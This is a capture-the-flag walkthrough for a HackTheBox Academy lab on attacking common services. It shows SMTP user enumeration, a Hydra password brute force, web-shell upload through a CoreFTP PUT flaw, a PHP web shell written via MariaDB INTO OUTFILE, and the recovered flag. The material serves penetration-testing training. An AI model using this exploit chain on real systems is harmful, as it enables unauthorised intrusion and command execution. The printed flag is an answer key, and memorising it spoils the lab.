Attacking Common Services - Easy

ℹ️ Informations¶

🌐 Website: HackTheBox
📚 Module: Attacking Common Services
🔗 Link: Attacking Common Services - Easy

❓Question¶

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.

📋 Walkthrough¶

First, add inlanefreight.htb to /etc/hosts, then perform an nmap scan to identify open ports and services.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV $target     
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 18:27 UTC
Nmap scan report for 10.129.203.7
Host is up (0.026s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp
|_ssl-date: 2025-03-20T17:28:16+00:00; -1h00m04s from scanner time.
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after:  2032-04-18T19:27:17
| fingerprint-strings: 
|   GenericLines: 
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|     Command unknown, not supported or not allowed...
|     Command unknown, not supported or not allowed...
|   Help: 
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|     214-The following commands are implemented
|     USER PASS ACCT QUIT PORT RETR
|     STOR DELE RNFR PWD CWD CDUP
|     NOOP TYPE MODE STRU
|     LIST NLST HELP FEAT UTF8 PASV
|     MDTM REST PBSZ PROT OPTS CCC
|     XCRC SIZE MFMT CLNT ABORT
|     HELP command successful
|   NULL: 
|_    220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.203.7/dashboard/
443/tcp  open  ssl/https
|_ssl-date: 2025-03-20T17:28:15+00:00; -1h00m04s from scanner time.
|_http-server-header: Core FTP HTTPS Server
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after:  2032-04-18T19:27:17
587/tcp  open  smtp          hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp open  mysql         MariaDB 5.5.5-10.4.24
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 11
|   Capabilities flags: 63486
|   Some Capabilities: ConnectWithDatabase, SupportsLoadDataLocal, Support41Auth, LongColumnFlag, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, Speaks41ProtocolNew, InteractiveClient, SupportsTransactions, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, IgnoreSigpipes, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: BxW,s"L7oI]yj(${bXrV
|_  Auth Plugin Name: mysql_native_password
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EASY
| Not valid before: 2025-03-19T17:21:05
|_Not valid after:  2025-09-18T17:21:05
|_ssl-date: 2025-03-20T17:28:15+00:00; -1h00m04s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: WIN-EASY
|   NetBIOS_Domain_Name: WIN-EASY
|   NetBIOS_Computer_Name: WIN-EASY
|   DNS_Domain_Name: WIN-EASY
|   DNS_Computer_Name: WIN-EASY
|   Product_Version: 10.0.17763
|_  System_Time: 2025-03-20T17:28:07+00:00
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=3/20%Time=67DC5E0D%P=x86_64-pc-linux-gnu%r(NULL
SF:,41,"220\x20Core\x20FTP\x20Server\x20Version\x202\.0,\x20build\x20725,\
SF:x2064-bit\x20Unregistered\r\n")%r(GenericLines,AD,"220\x20Core\x20FTP\x
SF:20Server\x20Version\x202\.0,\x20build\x20725,\x2064-bit\x20Unregistered
SF:\r\n502\x20Command\x20unknown,\x20not\x20supported\x20or\x20not\x20allo
SF:wed\.\.\.\r\n502\x20Command\x20unknown,\x20not\x20supported\x20or\x20no
SF:t\x20allowed\.\.\.\r\n")%r(Help,17B,"220\x20Core\x20FTP\x20Server\x20Ve
SF:rsion\x202\.0,\x20build\x20725,\x2064-bit\x20Unregistered\r\n214-The\x2
SF:0following\x20commands\x20are\x20implemented\r\n\x20\x20\x20\x20\x20USE
SF:R\x20\x20PASS\x20\x20ACCT\x20\x20QUIT\x20\x20PORT\x20\x20RETR\r\n\x20\x
SF:20\x20\x20\x20STOR\x20\x20DELE\x20\x20RNFR\x20\x20PWD\x20\x20\x20CWD\x2
SF:0\x20\x20CDUP\r\n\x20\x20\x20\x20\x20MKD\x20\x20\x20RMD\x20\x20\x20NOOP
SF:\x20\x20TYPE\x20\x20MODE\x20\x20STRU\r\n\x20\x20\x20\x20\x20LIST\x20\x2
SF:0NLST\x20\x20HELP\x20\x20FEAT\x20\x20UTF8\x20\x20PASV\r\n\x20\x20\x20\x
SF:20\x20MDTM\x20\x20REST\x20\x20PBSZ\x20\x20PROT\x20\x20OPTS\x20\x20CCC\r
SF:\n\x20\x20\x20\x20\x20XCRC\x20\x20SIZE\x20\x20MFMT\x20\x20CLNT\x20\x20A
SF:BORT\r\n214\x20\x20HELP\x20command\x20successful\r\n");
Service Info: Host: WIN-EASY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1h00m03s, deviation: 0s, median: -1h00m04s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.77 seconds

FTP Enumeration¶

Start with FTP. Check for anonymous login.

┌──(kali㉿kali)-[~]
└─$ ftp $target                      
Connected to 10.129.203.7.
220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
Name (10.129.203.7:kali): anonymous
331 password required for anonymous
Password: 
500 PASS: command not understood
ftp: Login failed
ftp>

SMTP Enumeration¶

Enumerate users using smtp-user-enum.

──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ smtp-user-enum -M RCPT -U users.list -t $target -D inlanefreight.htb   
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.list
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb

######## Scan started at Thu Mar 20 18:47:26 2025 #########
10.129.24.232: fiona@inlanefreight.htb exists
######## Scan completed at Thu Mar 20 18:47:28 2025 #########
1 results.

79 queries in 2 seconds (39.5 queries / sec)

We found the user fiona@inlanefreight.htb. Let's try a dictionary attack.

Dictionary Attack¶

Attempt to crack the password using Hydra.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l "fiona@inlanefreight.htb" -P passwords.list -f inlanefreight.htb pop3
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 18:48:33
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 250 login tries (l:1/p:250), ~16 tries per task
[DATA] attacking pop3://inlanefreight.htb:110/

Hydra did not work on POP3. Let's try guessing the FTP password for the user fiona.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l "fiona" -P /usr/share/wordlists/rockyou.txt -f ftp://$target
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 19:17:48
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.129.134.126:21/
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344351 to do in 3735:31h, 1 active
[21][ftp] host: 10.129.134.126   login: fiona   password: 987654321
[STATUS] attack finished for 10.129.134.126 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 19:19:05

We found the credentials fiona:987654321.

FTP Access¶

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $target
Connected to 10.129.134.126.
220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
Name (10.129.134.126:kali): fiona
331 password required for fiona
Password: 
230-Logged on
230 
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43655|)
ls

Disable passive mode and list files.

ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection
-r-xr-xrwx   1 owner    group              55 Apr 21  2022      docs.txt
-r-xr-xrwx   1 owner    group             255 Apr 22  2022      WebServersInfo.txt
226 Transfer Complete
ftp>

File Analysis¶

Download and analyze the files.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ cat docs.txt              
I'm testing the FTP using HTTPS, everything looks good.                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ cat WebServersInfo.txt 
CoreFTP:
Directory C:\CoreFTP
Ports: 21 & 443
Test Command: curl -k -H "Host: localhost" --basic -u <username>:<password> https://localhost/docs.txt

Apache
Directory "C:\xampp\htdocs\"
Ports: 80 & 4443
Test Command: curl http://localhost/test.php                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$

Exploiting CoreFTP¶

CoreFTP is known to have vulnerabilities. Let's try to upload a web shell.

curl -k -X PUT -H "Host: $target" --basic -u fiona:987654321 --data-binary "PoC." --path-as-is https://$target/docs.txt

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ curl -k -H "Host: $target" --basic -u fiona:987654321 https://$target/docs.txt 
PoC.

Uploading Web Shell¶

Upload a web shell using curl.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ curl -k -X PUT -H "Host: $target" --basic -u fiona:987654321 --data-binary @shell.php --path-as-is https://$target/shell.php
HTTP/1.1 200 Ok
Date:Thu, 20 Feb 2025 18:31:29 GMT
Server: Core FTP HTTP Server
Accept-Ranges: bytes
Connection: Keep-Alive
Content-type: application/octet-stream
Content-length: 5490

SQL Injection¶

If the above method fails, try SQL injection.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ mysql -h $target -u fiona -p987654321 --ssl=FALSE        
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 11
Server version: 10.4.24-MariaDB mariadb.org binary distribution
...existing code...

Create a web shell using SQL.

MariaDB [(none)]> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\\xampp\\htdocs\\test2.php';
Query OK, 1 row affected (0.027 sec)

Accessing the Web Shell¶

Access the web shell and retrieve the flag.

http://inlanefreight.htb/test2.php?c=dir%20C:\Users\Administrator\Desktop

Volume in drive C has no label. Volume Serial Number is B8B3-0D72 Directory of C:\Users\Administrator\Desktop 04/22/2022 10:40 AM
. 04/22/2022 10:40 AM
.. 04/22/2022 10:36 AM 39 flag.txt 1 File(s) 39 bytes 2 Dir(s) 15,629,279,232 bytes free

http://inlanefreight.htb/test2.php?c=type%20C:\Users\Administrator\Desktop\flag.txt

HTB{t#3r3_4r3_tw0_w4y$_t0_93t_t#3_fl49}

Answer

HTB{t#3r3_4r3_tw0_w4y$_t0_93t_t#3_fl49}